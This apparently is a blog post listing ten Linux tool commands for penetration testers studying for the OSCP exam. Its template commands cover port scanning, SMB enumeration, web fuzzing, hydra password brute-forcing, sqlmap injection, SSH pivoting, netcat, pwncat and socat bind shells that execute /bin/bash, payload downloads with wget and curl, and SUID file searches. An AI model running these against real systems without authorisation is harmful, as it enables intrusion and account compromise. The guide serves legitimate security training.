Penetration testers often use various Linux commands for reconnaissance, vulnerability assessment, exploitation, and post-exploitation.

Here are ten important Linux commands for penetration testers that want to crack the OSCP certification at the first attempt:

1. nmap / us: Port scanners for network discovery and security auditing.

nmap -sS -p- $IP

nmap --script=snmp-brute $IP

nmap --scripts default,safe $IP

us -mT -Iv $IP:a -r 3000 -R 3 && us -mU -Iv $IP:a -r 3000 -R 3

More scanning commands:

✅ Best commands for Port Scanning — For OSCP, pentests, bug bounties

DH

·

January 13, 2023

Read full story

2. enum4linux: Tool for enumerating information from Windows and Samba systems.

enum4linux -a <target>

3. ffuz: For targeted web files and folders brute forcing.

ffuf -w /path/to/wordlist -u https://target/FUZZ

ffuf --input-cmd 'radamsa --seed $FFUF_NUM example1.txt example2.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/FUZZ -mc all -fc 400

4. hydra: Password-cracking tool supporting various protocols.

hydra -l <username> -P <password-list> <target> <protocol>

More password cracking commands:

✅ Quick guide for password cracking

DH

·

February 8, 2023

Read full story

5. sqlmap: Automated SQL injection and database takeover tool.

sqlmap -u "http://<target>/page.php?id=1" --dbs

More SQL injection tricks:

🔝 How to get a xp_cmdshell reverse shell in a Windows Server

DH

·

January 1, 2023

Read full story

6. metasploit-framework: Framework for developing, testing, and using exploit code.

msfconsole

7. ssh for tunneling connections from a hacked machine to yours bypassing firewalls:

ssh -L <localhost port>:<remote IP>:<remote port> $IP

ssh -R <server side port>:<localhost>:<local port> $IP

ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>

More pivoting commands:

🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

DH

·

January 3, 2023

Read full story

8. netcat (nc) / ncat / pwncat / socat : Networking utility for reading and writing data across network connections.

nc -nvv -lp 8080

nc -nvvlp 8989 -e /bin/bash

pwncat -l -e '/bin/bash' 8080 -k

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

More commands for direct and reverse shells:

🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

DH

·

January 3, 2023

Read full story

9. wget / curl: Download files from the internet, useful for transferring payloads.

wget http://$URL/$FILE

curl -o file.bin -k http://$URL/$FILE

10. find: Search for files and directories based on various criteria.

find / -perm -4000 -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

find / -name "*.txt" -ls 2> /dev/null

find / -name "*.log" -ls 2> /dev/null

These commands are just a starting point, and the usage may vary based on the specific scenario and target environment.